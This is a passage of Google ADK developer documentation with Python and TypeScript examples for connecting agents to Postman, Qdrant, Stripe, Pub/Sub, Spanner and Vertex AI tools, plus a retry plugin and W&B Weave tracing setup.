Slack](https://arize-ai.slack.com/join/shared_invite/zt-11t1vbu4x-xkBIHmOREQnYnYDH1GDfCg#/shared-invite/email) - [OpenInference Package](https://github.com/Arize-ai/openinference/tree/main/python/instrumentation/openinference-instrumentation-google-adk) # Postman MCP tool for ADK Supported in ADKPythonTypeScript The [Postman MCP Server](https://github.com/postmanlabs/postman-mcp-server) connects your ADK agent to the [Postman](https://www.postman.com/) ecosystem. This integration gives your agent the ability to access workspaces, manage collections and environments, evaluate APIs, and automate workflows through natural language interactions. ## Use cases - **API testing**: Continuously test your APIs using your Postman collections. - **Collection management**: Create and tag collections, update documentation, add comments, or perform actions across multiple collections without leaving your editor. - **Workspace and environment management**: Create workspaces and environments, and manage your environment variables. - **Client code generation**: Generate production-ready client code that consumes APIs following best practices and project conventions. ## Prerequisites - Create a [Postman account](https://identity.getpostman.com/signup) - Generate a [Postman API key](https://postman.postman.co/settings/me/api-keys) ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters POSTMAN_API_KEY = "YOUR_POSTMAN_API_KEY" root_agent = Agent( model="gemini-2.5-pro", name="postman_agent", instruction="Help users manage their Postman workspaces and collections", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="npx", args=[ "-y", "@postman/postman-mcp-server", # "--full", # Use all 100+ tools # "--code", # Use code generation tools # "--region", "eu", # Use EU region ], env={ "POSTMAN_API_KEY": POSTMAN_API_KEY, }, ), timeout=30, ), ) ], ) ``` ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StreamableHTTPServerParams POSTMAN_API_KEY = "YOUR_POSTMAN_API_KEY" root_agent = Agent( model="gemini-2.5-pro", name="postman_agent", instruction="Help users manage their Postman workspaces and collections", tools=[ McpToolset( connection_params=StreamableHTTPServerParams( url="https://mcp.postman.com/mcp", # (Optional) Use "/minimal" for essential tools only # (Optional) Use "/code" for code generation tools # (Optional) Use "https://mcp.eu.postman.com" for EU region headers={ "Authorization": f"Bearer {POSTMAN_API_KEY}", }, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const POSTMAN_API_KEY = "YOUR_POSTMAN_API_KEY"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "postman_agent", instruction: "Help users manage their Postman workspaces and collections", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: [ "-y", "@postman/postman-mcp-server", // "--full", // Use all 100+ tools // "--code", // Use code generation tools // "--region", "eu", // Use EU region ], env: { POSTMAN_API_KEY: POSTMAN_API_KEY, }, }, }), ], }); export { rootAgent }; ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const POSTMAN_API_KEY = "YOUR_POSTMAN_API_KEY"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "postman_agent", instruction: "Help users manage their Postman workspaces and collections", tools: [ new MCPToolset({ type: "StreamableHTTPConnectionParams", url: "https://mcp.postman.com/mcp", // (Optional) Use "/minimal" for essential tools only // (Optional) Use "/code" for code generation tools // (Optional) Use "https://mcp.eu.postman.com" for EU region header: { Authorization: `Bearer ${POSTMAN_API_KEY}`, }, }), ], }); export { rootAgent }; ``` ## Configuration Postman offers three tool configurations: - **Minimal** (default): Essential tools for basic Postman operations. Best for simple modifications to collections, workspaces, or environments. - **Full**: All available Postman API tools (100+ tools). Ideal for advanced collaboration and enterprise features. - **Code**: Tools for searching API definitions and generating client code. Perfect for developers who need to consume APIs. To select a configuration: - **Local server**: Add `--full` or `--code` to the `args` list. - **Remote server**: Change the URL path to `/minimal`, `/mcp` (full), or `/code`. For EU region, use `--region eu` (local) or `https://mcp.eu.postman.com` (remote). ## Additional resources - [Postman MCP Server on GitHub](https://github.com/postmanlabs/postman-mcp-server) - [Postman API key settings](https://postman.postman.co/settings/me/api-keys) - [Postman Learning Center](https://learning.postman.com/) # Google Cloud Pub/Sub tool for ADK Supported in ADKPython v1.22.0 The `PubSubToolset` allows agents to interact with [Google Cloud Pub/Sub](https://cloud.google.com/pubsub) service to publish, pull, and acknowledge messages. ## Prerequisites Before using the `PubSubToolset`, you need to: 1. **Enable the Pub/Sub API** in your Google Cloud project. 1. **Authenticate and authorize**: Ensure that the principal (e.g., user, service account) running the agent has the necessary IAM permissions to perform Pub/Sub operations. For more information on Pub/Sub roles, see the [Pub/Sub access control documentation](https://cloud.google.com/pubsub/docs/access-control). 1. **Create a topic or subscription**: [Create a topic](https://cloud.google.com/pubsub/docs/create-topic) to publish messages and [create a subscription](https://cloud.google.com/pubsub/docs/create-subscription) to receive them. ## Usage ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio import os from google.adk.agents import Agent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.tools.pubsub.config import PubSubToolConfig from google.adk.tools.pubsub.pubsub_credentials import PubSubCredentialsConfig from google.adk.tools.pubsub.pubsub_toolset import PubSubToolset from google.genai import types import google.auth # Define constants for this example agent AGENT_NAME = "pubsub_agent" APP_NAME = "pubsub_app" USER_ID = "user1234" SESSION_ID = "1234" GEMINI_MODEL = "gemini-2.0-flash" # Define Pub/Sub tool config. # You can optionally set the project_id here, or let the agent infer it from context/user input. tool_config = PubSubToolConfig(project_id=os.getenv("GOOGLE_CLOUD_PROJECT")) # Uses externally-managed Application Default Credentials (ADC) by default. # This decouples authentication from the agent / tool lifecycle. # https://cloud.google.com/docs/authentication/provide-credentials-adc application_default_credentials, _ = google.auth.default() credentials_config = PubSubCredentialsConfig( credentials=application_default_credentials ) # Instantiate a Pub/Sub toolset pubsub_toolset = PubSubToolset( credentials_config=credentials_config, pubsub_tool_config=tool_config ) # Agent Definition pubsub_agent = Agent( model=GEMINI_MODEL, name=AGENT_NAME, description=( "Agent to publish, pull, and acknowledge messages from Google Cloud" " Pub/Sub." ), instruction="""\ You are a cloud engineer agent with access to Google Cloud Pub/Sub tools. You can publish messages to topics, pull messages from subscriptions, and acknowledge messages. """, tools=[pubsub_toolset], ) # Session and Runner session_service = InMemorySessionService() session = asyncio.run( session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID ) ) runner = Runner( agent=pubsub_agent, app_name=APP_NAME, session_service=session_service ) # Agent Interaction def call_agent(query): """ Helper function to call the agent with a query. """ content = types.Content(role="user", parts=[types.Part(text=query)]) events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content) print("USER:", query) for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("AGENT:", final_response) call_agent("publish 'Hello World' to 'my-topic'") call_agent("pull messages from 'my-subscription'") ``` ## Tools The `PubSubToolset` includes the following tools: ### `publish_message` Publishes a message to a Pub/Sub topic. | Parameter | Type | Description | | -------------- | ---------------- | -------------------------------------------------------------------------------------------------------- | | `topic_name` | `str` | The name of the Pub/Sub topic (e.g., `projects/my-project/topics/my-topic`). | | `message` | `str` | The message content to publish. | | `attributes` | `dict[str, str]` | (Optional) Attributes to attach to the message. | | `ordering_key` | `str` | (Optional) The ordering key for the message. If you set this parameter, messages are published in order. | ### `pull_messages` Pulls messages from a Pub/Sub subscription. | Parameter | Type | Description | | ------------------- | ------ | ---------------------------------------------------------------------------------------- | | `subscription_name` | `str` | The name of the Pub/Sub subscription (e.g., `projects/my-project/subscriptions/my-sub`). | | `max_messages` | `int` | (Optional) The maximum number of messages to pull. Defaults to `1`. | | `auto_ack` | `bool` | (Optional) Whether to automatically acknowledge the messages. Defaults to `False`. | ### `acknowledge_messages` Acknowledges one or more messages on a Pub/Sub subscription. | Parameter | Type | Description | | ------------------- | ----------- | ---------------------------------------------------------------------------------------- | | `subscription_name` | `str` | The name of the Pub/Sub subscription (e.g., `projects/my-project/subscriptions/my-sub`). | | `ack_ids` | `list[str]` | A list of acknowledgment IDs to acknowledge. | # Qdrant MCP tool for ADK Supported in ADKPythonTypeScript The [Qdrant MCP Server](https://github.com/qdrant/mcp-server-qdrant) connects your ADK agent to [Qdrant](https://qdrant.tech/), an open-source vector search engine. This integration gives your agent the ability to store and retrieve information using semantic search. ## Use cases - **Semantic Memory for Agents**: Store conversation context, facts, or learned information that agents can retrieve later using natural language queries. - **Code Repository Search**: Build a searchable index of code snippets, documentation, and implementation patterns that can be queried semantically. - **Knowledge Base Retrieval**: Create a retrieval-augmented generation (RAG) system by storing documents and retrieving relevant context for responses. ## Prerequisites - A running Qdrant instance. You can: - Use [Qdrant Cloud](https://cloud.qdrant.io/) (managed service) - Run locally with Docker: `docker run -p 6333:6333 qdrant/qdrant` - (Optional) A Qdrant API key for authentication ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters QDRANT_URL = "http://localhost:6333" # Or your Qdrant Cloud URL COLLECTION_NAME = "my_collection" # QDRANT_API_KEY = "YOUR_QDRANT_API_KEY" root_agent = Agent( model="gemini-2.5-pro", name="qdrant_agent", instruction="Help users store and retrieve information using semantic search", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="uvx", args=["mcp-server-qdrant"], env={ "QDRANT_URL": QDRANT_URL, "COLLECTION_NAME": COLLECTION_NAME, # "QDRANT_API_KEY": QDRANT_API_KEY, } ), timeout=30, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const QDRANT_URL = "http://localhost:6333"; // Or your Qdrant Cloud URL const COLLECTION_NAME = "my_collection"; // const QDRANT_API_KEY = "YOUR_QDRANT_API_KEY"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "qdrant_agent", instruction: "Help users store and retrieve information using semantic search", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "uvx", args: ["mcp-server-qdrant"], env: { QDRANT_URL: QDRANT_URL, COLLECTION_NAME: COLLECTION_NAME, // QDRANT_API_KEY: QDRANT_API_KEY, }, }, }), ], }); export { rootAgent }; ``` ## Available tools | Tool | Description | | -------------- | -------------------------------------------------------------- | | `qdrant-store` | Store information in Qdrant with optional metadata | | `qdrant-find` | Search for relevant information using natural language queries | ## Configuration The Qdrant MCP server can be configured using environment variables: | Variable | Description | Default | | ------------------------ | ------------------------------------------------------ | ---------------------------------------- | | `QDRANT_URL` | URL of the Qdrant server | `None` (required) | | `QDRANT_API_KEY` | API key for Qdrant Cloud authentication | `None` | | `COLLECTION_NAME` | Name of the collection to use | `None` | | `QDRANT_LOCAL_PATH` | Path for local persistent storage (alternative to URL) | `None` | | `EMBEDDING_MODEL` | Embedding model to use | `sentence-transformers/all-MiniLM-L6-v2` | | `EMBEDDING_PROVIDER` | Provider for embeddings (`fastembed` or `ollama`) | `fastembed` | | `TOOL_STORE_DESCRIPTION` | Custom description for the store tool | Default description | | `TOOL_FIND_DESCRIPTION` | Custom description for the find tool | Default description | ### Custom tool descriptions You can customize the tool descriptions to guide the agent's behavior: ```python env={ "QDRANT_URL": "http://localhost:6333", "COLLECTION_NAME": "code-snippets", "TOOL_STORE_DESCRIPTION": "Store code snippets with descriptions. The 'information' parameter should contain a description of what the code does, while the actual code should be in 'metadata.code'.", "TOOL_FIND_DESCRIPTION": "Search for relevant code snippets using natural language. Describe the functionality you're looking for.", } ``` ## Additional resources - [Qdrant MCP Server Repository](https://github.com/qdrant/mcp-server-qdrant) - [Qdrant Documentation](https://qdrant.tech/documentation/) - [Qdrant Cloud](https://cloud.qdrant.io/) # Reflect and Retry plugin for ADK Supported in ADKPython v1.16.0 The Reflect and Retry plugin can help your agent recover from error responses from ADK [Tools](/adk-docs/tools-custom/) and automatically retry the tool request. This plugin intercepts tool failures, provides structured guidance to the AI model for reflection and correction, and retries the operation up to a configurable limit. This plugin can help you build more resilience into your agent workflows, including the following capabilities: - **Concurrency safe**: Uses locking to safely handle parallel tool executions. - **Configurable scope**: Tracks failures per-invocation (default) or globally. - **Granular tracking**: Failure counts are tracked per-tool. - **Custom error extraction**: Supports detecting errors in normal tool responses. ## Add Reflect and Retry Plugin Add this plugin to your ADK workflow by adding it to the plugins setting of your ADK project's App object, as shown below: ```python from google.adk.apps.app import App from google.adk.plugins import ReflectAndRetryToolPlugin app = App( name="my_app", root_agent=root_agent, plugins=[ ReflectAndRetryToolPlugin(max_retries=3), ], ) ``` With this configuration, if any tool called by an agent returns an error, the request is updated and tried again, up to a maximum of 3 attempts, per tool. ## Configuration settings The Reflect and Retry Plugin has the following configuration options: - **`max_retries`**: (optional) Total number of additional attempts the system makes to receive a non-error response. Default value is 3. - **`throw_exception_if_retry_exceeded`**: (optional) If set to `False`, the system does not raise an error if the final retry attempt fails. Default value is `True`. - **`tracking_scope`**: (optional) - **`TrackingScope.INVOCATION`**: Track tool failures across a single invocation and user. This value is the default. - **`TrackingScope.GLOBAL`**: Track tool failures across all invocations and all users. ### Advanced configuration You can further modify the behavior of this plugin by extending the `ReflectAndRetryToolPlugin` class. The following code sample demonstrates a simple extension of the behavior by selecting responses with an error status: ```python class CustomRetryPlugin(ReflectAndRetryToolPlugin): async def extract_error_from_result(self, *, tool, tool_args,tool_context, result): # Detect error based on response content if result.get('status') == 'error': return result return None # No error detected # add this modified plugin to your App object: error_handling_plugin = CustomRetryPlugin(max_retries=5) ``` ## Next steps For complete code samples using the Reflect and Retry plugin, see the following: - [Basic](https://github.com/google/adk-python/tree/main/contributing/samples/plugin_reflect_tool_retry/basic) code sample - [Hallucinating function name](https://github.com/google/adk-python/tree/main/contributing/samples/plugin_reflect_tool_retry/hallucinating_func_name) code sample # Google Cloud Spanner tool for ADK Supported in ADKPython v1.11.0 These are a set of tools aimed to provide integration with Spanner, namely: - **`list_table_names`**: Fetches table names present in a GCP Spanner database. - **`list_table_indexes`**: Fetches table indexes present in a GCP Spanner database. - **`list_table_index_columns`**: Fetches table index columns present in a GCP Spanner database. - **`list_named_schemas`**: Fetches named schema for a Spanner database. - **`get_table_schema`**: Fetches Spanner database table schema and metadata information. - **`execute_sql`**: Runs a SQL query in Spanner database and fetch the result. - **`similarity_search`**: Similarity search in Spanner using a text query. They are packaged in the toolset `SpannerToolset`. ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio from google.adk.agents import Agent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService # from google.adk.sessions import DatabaseSessionService from google.adk.tools.google_tool import GoogleTool from google.adk.tools.spanner import query_tool from google.adk.tools.spanner.settings import SpannerToolSettings from google.adk.tools.spanner.settings import Capabilities from google.adk.tools.spanner.spanner_credentials import SpannerCredentialsConfig from google.adk.tools.spanner.spanner_toolset import SpannerToolset from google.genai import types from google.adk.tools.tool_context import ToolContext import google.auth from google.auth.credentials import Credentials # Define constants for this example agent AGENT_NAME = "spanner_agent" APP_NAME = "spanner_app" USER_ID = "user1234" SESSION_ID = "1234" GEMINI_MODEL = "gemini-2.5-flash" # Define Spanner tool config with read capability set to allowed. tool_settings = SpannerToolSettings(capabilities=[Capabilities.DATA_READ]) # Define a credentials config - in this example we are using application default # credentials # https://cloud.google.com/docs/authentication/provide-credentials-adc application_default_credentials, _ = google.auth.default() credentials_config = SpannerCredentialsConfig( credentials=application_default_credentials ) # Instantiate a Spanner toolset spanner_toolset = SpannerToolset( credentials_config=credentials_config, spanner_tool_settings=tool_settings ) # Optional # Create a wrapped function tool for the agent on top of the built-in # `execute_sql` tool in the Spanner toolset. # For example, this customized tool can perform a dynamically-built query. def count_rows_tool( table_name: str, credentials: Credentials, # GoogleTool handles `credentials` settings: SpannerToolSettings, # GoogleTool handles `settings` tool_context: ToolContext, # GoogleTool handles `tool_context` ): """Counts the total number of rows for a specified table. Args: table_name: The name of the table for which to count rows. Returns: The total number of rows in the table. """ # Replace the following settings for a specific Spanner database. PROJECT_ID = "" INSTANCE_ID = "" DATABASE_ID = "" query = f""" SELECT count(*) FROM {table_name} """ return query_tool.execute_sql( project_id=PROJECT_ID, instance_id=INSTANCE_ID, database_id=DATABASE_ID, query=query, credentials=credentials, settings=settings, tool_context=tool_context, ) # Agent Definition spanner_agent = Agent( model=GEMINI_MODEL, name=AGENT_NAME, description=( "Agent to answer questions about Spanner database and execute SQL queries." ), instruction="""\ You are a data assistant agent with access to several Spanner tools. Make use of those tools to answer the user's questions. """, tools=[ spanner_toolset, # Add customized Spanner tool based on the built-in Spanner toolset. GoogleTool( func=count_rows_tool, credentials_config=credentials_config, tool_settings=tool_settings, ), ], ) # Session and Runner session_service = InMemorySessionService() # Optionally, Spanner can be used as the Database Session Service for production. # Note that it's suggested to use a dedicated instance/database for storing sessions. # session_service_spanner_db_url = "spanner+spanner:///projects/PROJECT_ID/instances/INSTANCE_ID/databases/my-adk-session" # session_service = DatabaseSessionService(db_url=session_service_spanner_db_url) session = asyncio.run( session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID ) ) runner = Runner( agent=spanner_agent, app_name=APP_NAME, session_service=session_service ) # Agent Interaction def call_agent(query): """ Helper function to call the agent with a query. """ content = types.Content(role="user", parts=[types.Part(text=query)]) events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content) print("USER:", query) for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("AGENT:", final_response) # Replace the Spanner database and table names below with your own. call_agent("List all tables in projects//instances//databases/") call_agent("Describe the schema of ") call_agent("List the top 5 rows in ") ``` # Stripe MCP tool for ADK Supported in ADKPythonTypeScript The [Stripe MCP Server](https://docs.stripe.com/mcp) connects your ADK agent to the [Stripe](https://stripe.com/) ecosystem. This integration gives your agent the ability to manage payments, customers, subscriptions, and invoices using natural language, enabling automated commerce workflows and financial operations. ## Use cases - **Automate Payment Operations**: Create payment links, process refunds, and list payment intents through conversational commands. - **Streamline Invoicing**: Generate and finalize invoices, add line items, and track outstanding payments without leaving your development environment. - **Access Business Insights**: Query account balances, list products and prices, and search across Stripe resources to make data-driven decisions. ## Prerequisites - Create a [Stripe account](https://dashboard.stripe.com/register) - Generate a [Restricted API key](https://dashboard.stripe.com/apikeys) from the Stripe Dashboard ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters STRIPE_SECRET_KEY = "YOUR_STRIPE_SECRET_KEY" root_agent = Agent( model="gemini-2.5-pro", name="stripe_agent", instruction="Help users manage their Stripe account", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="npx", args=[ "-y", "@stripe/mcp", "--tools=all", # (Optional) Specify which tools to enable # "--tools=customers.read,invoices.read,products.read", ], env={ "STRIPE_SECRET_KEY": STRIPE_SECRET_KEY, } ), timeout=30, ), ) ], ) ``` ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StreamableHTTPServerParams STRIPE_SECRET_KEY = "YOUR_STRIPE_SECRET_KEY" root_agent = Agent( model="gemini-2.5-pro", name="stripe_agent", instruction="Help users manage their Stripe account", tools=[ McpToolset( connection_params=StreamableHTTPServerParams( url="https://mcp.stripe.com", headers={ "Authorization": f"Bearer {STRIPE_SECRET_KEY}", }, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const STRIPE_SECRET_KEY = "YOUR_STRIPE_SECRET_KEY"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "stripe_agent", instruction: "Help users manage their Stripe account", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: [ "-y", "@stripe/mcp", "--tools=all", // (Optional) Specify which tools to enable // "--tools=customers.read,invoices.read,products.read", ], env: { STRIPE_SECRET_KEY: STRIPE_SECRET_KEY, }, }, }), ], }); export { rootAgent }; ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const STRIPE_SECRET_KEY = "YOUR_STRIPE_SECRET_KEY"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "stripe_agent", instruction: "Help users manage their Stripe account", tools: [ new MCPToolset({ type: "StreamableHTTPConnectionParams", url: "https://mcp.stripe.com", header: { Authorization: `Bearer ${STRIPE_SECRET_KEY}`, }, }), ], }); export { rootAgent }; ``` Best practices Enable human confirmation of tool actions and exercise caution when using the Stripe MCP server alongside other MCP servers to mitigate prompt injection risks. ## Available tools | Resource | Tool | API | | ------------- | ----------------------------- | ----------------------- | | Account | `get_stripe_account_info` | Retrieve account | | Balance | `retrieve_balance` | Retrieve balance | | Coupon | `create_coupon` | Create coupon | | Coupon | `list_coupons` | List coupons | | Customer | `create_customer` | Create customer | | Customer | `list_customers` | List customers | | Dispute | `list_disputes` | List disputes | | Dispute | `update_dispute` | Update dispute | | Invoice | `create_invoice` | Create invoice | | Invoice | `create_invoice_item` | Create invoice item | | Invoice | `finalize_invoice` | Finalize invoice | | Invoice | `list_invoices` | List invoices | | Payment Link | `create_payment_link` | Create payment link | | PaymentIntent | `list_payment_intents` | List PaymentIntents | | Price | `create_price` | Create price | | Price | `list_prices` | List prices | | Product | `create_product` | Create product | | Product | `list_products` | List products | | Refund | `create_refund` | Create refund | | Subscription | `cancel_subscription` | Cancel subscription | | Subscription | `list_subscriptions` | List subscriptions | | Subscription | `update_subscription` | Update subscription | | Others | `search_stripe_resources` | Search Stripe resources | | Others | `fetch_stripe_resources` | Fetch Stripe object | | Others | `search_stripe_documentation` | Search Stripe knowledge | ## Additional resources - [Stripe MCP Server Documentation](https://docs.stripe.com/mcp) - [Stripe MCP Server on GitHub](https://github.com/stripe/ai/tree/main/tools/modelcontextprotocol) - [Build on Stripe with LLMs](https://docs.stripe.com/building-with-llms) - [Add Stripe to your agentic workflows](https://docs.stripe.com/agents) # Vertex AI RAG Engine tool for ADK Supported in ADKPython v0.1.0Java v0.2.0 The `vertex_ai_rag_retrieval` tool allows the agent to perform private data retrieval using Vertex AI RAG Engine. When you use grounding with Vertex AI RAG Engine, you need to prepare a RAG corpus beforehand. Please refer to the [RAG ADK agent sample](https://github.com/google/adk-samples/blob/main/python/agents/RAG/rag/shared_libraries/prepare_corpus_and_data.py) or [Vertex AI RAG Engine page](https://cloud.google.com/vertex-ai/generative-ai/docs/rag-engine/rag-quickstart) for setting it up. Warning: Single tool per agent limitation This tool can only be used ***by itself*** within an agent instance. For more information about this limitation and workarounds, see [Limitations for ADK tools](/adk-docs/tools/limitations/). ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from google.adk.agents import Agent from google.adk.tools.retrieval.vertex_ai_rag_retrieval import VertexAiRagRetrieval from vertexai.preview import rag from dotenv import load_dotenv from .prompts import return_instructions_root load_dotenv() ask_vertex_retrieval = VertexAiRagRetrieval( name='retrieve_rag_documentation', description=( 'Use this tool to retrieve documentation and reference materials for the question from the RAG corpus,' ), rag_resources=[ rag.RagResource( # please fill in your own rag corpus # here is a sample rag corpus for testing purpose # e.g. projects/123/locations/us-central1/ragCorpora/456 rag_corpus=os.environ.get("RAG_CORPUS") ) ], similarity_top_k=10, vector_distance_threshold=0.6, ) root_agent = Agent( model='gemini-2.0-flash-001', name='ask_rag_agent', instruction=return_instructions_root(), tools=[ ask_vertex_retrieval, ] ) ``` # Vertex AI Search tool for ADK Supported in ADKPython v0.1.0 The `vertex_ai_search_tool` uses Google Cloud Vertex AI Search, enabling the agent to search across your private, configured data stores (e.g., internal documents, company policies, knowledge bases). This built-in tool requires you to provide the specific data store ID during configuration. For further details of the tool, see [Understanding Vertex AI Search grounding](/adk-docs/grounding/vertex_ai_search_grounding/). Warning: Single tool per agent limitation This tool can only be used ***by itself*** within an agent instance. For more information about this limitation and workarounds, see [Limitations for ADK tools](/adk-docs/tools/limitations/#one-tool-one-agent). ```py # Copyright 2024 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio from google.adk.agents import LlmAgent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.genai import types from google.adk.tools import VertexAiSearchTool # Replace with your Vertex AI Search Datastore ID, and respective region (e.g. us-central1 or global). # Format: projects//locations//collections/default_collection/dataStores/ DATASTORE_PATH = "DATASTORE_PATH_HERE" # Constants APP_NAME_VSEARCH = "vertex_search_app" USER_ID_VSEARCH = "user_vsearch_1" SESSION_ID_VSEARCH = "session_vsearch_1" AGENT_NAME_VSEARCH = "doc_qa_agent" GEMINI_2_FLASH = "gemini-2.0-flash" # Tool Instantiation # You MUST provide your datastore ID here. vertex_search_tool = VertexAiSearchTool(data_store_id=DATASTORE_PATH) # Agent Definition doc_qa_agent = LlmAgent( name=AGENT_NAME_VSEARCH, model=GEMINI_2_FLASH, # Requires Gemini model tools=[vertex_search_tool], instruction=f"""You are a helpful assistant that answers questions based on information found in the document store: {DATASTORE_PATH}. Use the search tool to find relevant information before answering. If the answer isn't in the documents, say that you couldn't find the information. """, description="Answers questions using a specific Vertex AI Search datastore.", ) # Session and Runner Setup session_service_vsearch = InMemorySessionService() runner_vsearch = Runner( agent=doc_qa_agent, app_name=APP_NAME_VSEARCH, session_service=session_service_vsearch ) session_vsearch = session_service_vsearch.create_session( app_name=APP_NAME_VSEARCH, user_id=USER_ID_VSEARCH, session_id=SESSION_ID_VSEARCH ) # Agent Interaction Function async def call_vsearch_agent_async(query): print("\n--- Running Vertex AI Search Agent ---") print(f"Query: {query}") if "DATASTORE_PATH_HERE" in DATASTORE_PATH: print("Skipping execution: Please replace DATASTORE_PATH_HERE with your actual datastore ID.") print("-" * 30) return content = types.Content(role='user', parts=[types.Part(text=query)]) final_response_text = "No response received." try: async for event in runner_vsearch.run_async( user_id=USER_ID_VSEARCH, session_id=SESSION_ID_VSEARCH, new_message=content ): # Like Google Search, results are often embedded in the model's response. if event.is_final_response() and event.content and event.content.parts: final_response_text = event.content.parts[0].text.strip() print(f"Agent Response: {final_response_text}") # You can inspect event.grounding_metadata for source citations if event.grounding_metadata: print(f" (Grounding metadata found with {len(event.grounding_metadata.grounding_attributions)} attributions)") except Exception as e: print(f"An error occurred: {e}") print("Ensure your datastore ID is correct and the service account has permissions.") print("-" * 30) # --- Run Example --- async def run_vsearch_example(): # Replace with a question relevant to YOUR datastore content await call_vsearch_agent_async("Summarize the main points about the Q2 strategy document.") await call_vsearch_agent_async("What safety procedures are mentioned for lab X?") # Execute the example # await run_vsearch_example() # Running locally due to potential colab asyncio issues with multiple awaits try: asyncio.run(run_vsearch_example()) except RuntimeError as e: if "cannot be called from a running event loop" in str(e): print("Skipping execution in running event loop (like Colab/Jupyter). Run locally.") else: raise e ``` # W&B Weave observability for ADK Supported in ADKPython [W&B Weave](https://weave-docs.wandb.ai/) provides a powerful platform for logging and visualizing model calls. By integrating Google ADK with Weave, you can track and analyze your agent's performance and behavior using OpenTelemetry (OTEL) traces. ## Prerequisites 1. Sign up for an account at [WandB](https://wandb.ai). 1. Obtain your API key from [WandB Authorize](https://wandb.ai/authorize). 1. Configure your environment with the required API keys: ```bash export WANDB_API_KEY= export GOOGLE_API_KEY= ``` ## Install Dependencies Ensure you have the necessary packages installed: ```bash pip install google-adk opentelemetry-sdk opentelemetry-exporter-otlp-proto-http ``` ## Sending Traces to Weave This example demonstrates how to configure OpenTelemetry to send Google ADK traces to Weave. ```python # math_agent/agent.py import base64 import os from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter from opentelemetry.sdk import trace as trace_sdk from opentelemetry.sdk.trace.export import SimpleSpanProcessor from opentelemetry import trace from google.adk.agents import LlmAgent from google.adk.tools import FunctionTool from dotenv import load_dotenv load_dotenv() # Configure Weave endpoint and authentication WANDB_BASE_URL = "https://trace.wandb.ai" PROJECT_ID = "your-entity/your-project" # e.g., "teamid/projectid" OTEL_EXPORTER_OTLP_ENDPOINT = f"{WANDB_BASE_URL}/otel/v1/traces" # Set up authentication WANDB_API_KEY = os.getenv("WANDB_API_KEY") AUTH = base64.b64encode(f"api:{WANDB_API_KEY}".encode()).decode() OTEL_EXPORTER_OTLP_HEADERS = { "Authorization": f"Basic {AUTH}", "project_id": PROJECT_ID, } # Create the OTLP span exporter with endpoint and headers exporter = OTLPSpanExporter( endpoint=OTEL_EXPORTER_OTLP_ENDPOINT, headers=OTEL_EXPORTER_OTLP_HEADERS, ) # Create a tracer provider and add the exporter tracer_provider = trace_sdk.TracerProvider() tracer_provider.add_span_processor(SimpleSpanProcessor(exporter)) # Set the global tracer provider BEFORE 